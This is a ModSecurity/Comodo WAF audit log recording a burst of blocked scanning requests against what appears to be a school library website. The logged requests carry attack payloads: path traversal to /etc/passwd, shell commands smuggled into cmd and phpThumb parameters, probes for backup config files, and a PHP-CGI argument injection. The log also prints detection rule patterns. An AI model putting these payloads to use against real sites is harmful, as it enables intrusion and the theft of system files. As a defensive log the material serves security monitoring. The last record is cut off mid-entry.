Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ba3c48-Z-- --9d364f05-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u8AAAANg 103.236.140.4 49162 103.236.140.4 8181 --9d364f05-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875284 --9d364f05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9d364f05-E-- --9d364f05-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172836124940 1571 (- - -) Stopwatch2: 1747172836124940 1571; combined=458, p1=338, p2=93, p3=0, p4=0, p5=26, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d364f05-Z-- --3f3a1156-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u8QAAANY 103.236.140.4 49162 103.236.140.4 8181 --3f3a1156-B-- GET /php/ping.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274903 --3f3a1156-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3f3a1156-E-- --3f3a1156-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/ping.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172836322983 1659 (- - -) Stopwatch2: 1747172836322983 1659; combined=509, p1=379, p2=104, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f3a1156-Z-- --e8882758-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u8gAAAMA 103.236.140.4 49162 103.236.140.4 8181 --e8882758-B-- GET /php/file.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875287 --e8882758-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e8882758-E-- --e8882758-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/file.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172836521708 1400 (- - -) Stopwatch2: 1747172836521708 1400; combined=442, p1=322, p2=93, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8882758-Z-- --51f83b2b-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u8wAAAME 103.236.140.4 49162 103.236.140.4 8181 --51f83b2b-B-- GET /php/download.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274906 --51f83b2b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --51f83b2b-E-- --51f83b2b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /php/download.php?cmd=cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172836720002 1483 (- - -) Stopwatch2: 1747172836720002 1483; combined=408, p1=298, p2=87, p3=0, p4=0, p5=23, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51f83b2b-Z-- --220bcc08-A-- [14/May/2025:04:47:16 +0700] aCO95MOlTOX2TmGW6__u9AAAAMI 103.236.140.4 49162 103.236.140.4 8181 --220bcc08-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875290 --220bcc08-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --220bcc08-E-- --220bcc08-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172836919374 1402 (- - -) Stopwatch2: 1747172836919374 1402; combined=435, p1=316, p2=92, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --220bcc08-Z-- --a6a8be4c-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u9QAAAMQ 103.236.140.4 49162 103.236.140.4 8181 --a6a8be4c-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274909 --a6a8be4c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a6a8be4c-E-- --a6a8be4c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837117775 1601 (- - -) Stopwatch2: 1747172837117775 1601; combined=460, p1=340, p2=93, p3=0, p4=0, p5=26, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6a8be4c-Z-- --14e48225-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u9gAAAMM 103.236.140.4 49162 103.236.140.4 8181 --14e48225-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875293 --14e48225-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --14e48225-E-- --14e48225-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837316410 1666 (- - -) Stopwatch2: 1747172837316410 1666; combined=461, p1=342, p2=93, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14e48225-Z-- --476d246c-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u9wAAAMU 103.236.140.4 49162 103.236.140.4 8181 --476d246c-B-- GET /download.php?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274912 --476d246c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --476d246c-E-- --476d246c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837514657 1565 (- - -) Stopwatch2: 1747172837514657 1565; combined=446, p1=335, p2=85, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --476d246c-Z-- --ae778c5b-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u-AAAAMY 103.236.140.4 49162 103.236.140.4 8181 --ae778c5b-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875296 --ae778c5b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ae778c5b-E-- --ae778c5b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837713015 1689 (- - -) Stopwatch2: 1747172837713015 1689; combined=499, p1=381, p2=93, p3=0, p4=0, p5=25, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae778c5b-Z-- --b3e74539-A-- [14/May/2025:04:47:17 +0700] aCO95cOlTOX2TmGW6__u-QAAAMc 103.236.140.4 49162 103.236.140.4 8181 --b3e74539-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274915 --b3e74539-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b3e74539-E-- --b3e74539-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172837911817 1639 (- - -) Stopwatch2: 1747172837911817 1639; combined=457, p1=341, p2=90, p3=0, p4=0, p5=26, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3e74539-Z-- --4b8d6e6e-A-- [14/May/2025:04:49:39 +0700] aCO-c8abX6K9rhby1vhLogAAAJI 103.236.140.4 50622 103.236.140.4 8181 --4b8d6e6e-B-- GET /config.inc.php.old HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147275972 --4b8d6e6e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b8d6e6e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172979675828 2041 (- - -) Stopwatch2: 1747172979675828 2041; combined=801, p1=350, p2=425, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b8d6e6e-Z-- --061e3c12-A-- [14/May/2025:04:49:40 +0700] aCO-dMabX6K9rhby1vhLpAAAAJU 103.236.140.4 50622 103.236.140.4 8181 --061e3c12-B-- GET /config.inc.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147275975 --061e3c12-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --061e3c12-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172980075480 1831 (- - -) Stopwatch2: 1747172980075480 1831; combined=707, p1=338, p2=343, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --061e3c12-Z-- --9629b048-A-- [14/May/2025:04:49:41 +0700] aCO-dcabX6K9rhby1vhLqwAAAIQ 103.236.140.4 50622 103.236.140.4 8181 --9629b048-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876370 --9629b048-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9629b048-E-- --9629b048-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747172981485137 2993 (- - -) Stopwatch2: 1747172981485137 2993; combined=1792, p1=391, p2=1374, p3=0, p4=0, p5=27, sr=103, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9629b048-Z-- --5775c853-A-- [14/May/2025:04:49:42 +0700] aCO-dsabX6K9rhby1vhLrwAAAIg 103.236.140.4 50622 103.236.140.4 8181 --5775c853-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876376 --5775c853-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 
